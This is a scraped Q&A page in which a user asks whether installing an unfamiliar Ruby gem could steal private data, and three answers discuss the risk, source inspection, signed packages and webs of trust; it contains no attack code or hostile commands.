Logo Questions Linux Laravel Mysql Ubuntu Git Menu
 

Is there a risk of a Ruby gem acting like a trojan?

I was just about to install a Ruby gem by someone I hadn't heard of. But something made me think "Who is this guy?". Is there any risk of a Ruby gem accessing private data on your machine and transmitting it elsewhere - since the gem system has Internet access? Or are there protections against this?

like image 206
Hola Avatar asked Jun 04 '09 21:06

Hola


3 Answers

Of course there is. You're installing software on your computer that runs with the privileges of the script/user that calls it. It's probably easier to spot malicious code in pure Ruby than in binary packages. But if you think source inspection is a guaranteed way to spot malicious code, check out the under-handed C contest.

That said, if you want to write malware there are more effective delivery systems than Ruby gems. I would not be surprised if the number of actual malicious gems in existence is 0, and thus that the probability that this one is malicious is likewise 0...

See: http://rubygems.org/read/chapter/14#page61

like image 198
Steve Jessop Avatar answered Oct 19 '22 16:10

Steve Jessop


There is a risk of malicious code whenever you import unknown logic into an application. The risks are only as deep as the data to which that application has access. Like how Java applets are sandboxed.

Get signed packages you trust, or look at the source.

like image 40
Aiden Bell Avatar answered Oct 19 '22 16:10

Aiden Bell


If I wanted to get a handle on the likelihood of a malicious gem occurring, I'd look at whether malicious packages have been detected in any language (eg python egs, or Perl's CPAN), how likely it is that a malicious package has been produced without anyone noticing, and whether ruby is at any greater risk than other languages.

I might see if I could generate a web of trust - even if I don't know the gem author, do I know someone who does?

I might also look at whether package managers such as Debian examine whether packages are malicious, and if so, whether they've examined the gem you want to use.

like image 2
Andrew Grimm Avatar answered Oct 19 '22 17:10

Andrew Grimm